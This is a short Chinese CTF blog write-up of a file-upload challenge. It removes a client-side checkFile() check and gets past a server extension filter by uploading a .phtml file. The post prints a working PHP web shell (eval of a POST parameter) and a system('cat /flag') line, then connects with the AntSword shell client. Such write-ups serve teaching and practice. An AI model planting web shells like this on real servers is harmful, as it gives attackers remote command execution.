CTF笔记

Puppet-n

于 2021-04-17 15:34:46 发布

阅读量216

点赞数 1

分类专栏： CTF

本文链接：https://blog.youkuaiyun.com/m0_51966419/article/details/115796158

版权

2 篇文章

订阅专栏

打开页面，鼠标移动到灯泡上

显然是文件上传，上传一个php文件
在这里插入图片描述
被过滤了，审查元素

发现有一个return checkFile()的事件，删除，继续上传

看来后端也过滤了，接着试一试phtml文件（后缀为.phtml)
phtml文件内容：

<script language='php'>@eval($_POST['a']);</script>
<script language='php'>system('cat /flag');</script>

上传成功
用蚁剑连接
在这里插入图片描述

连接成功
在根目录下找到flag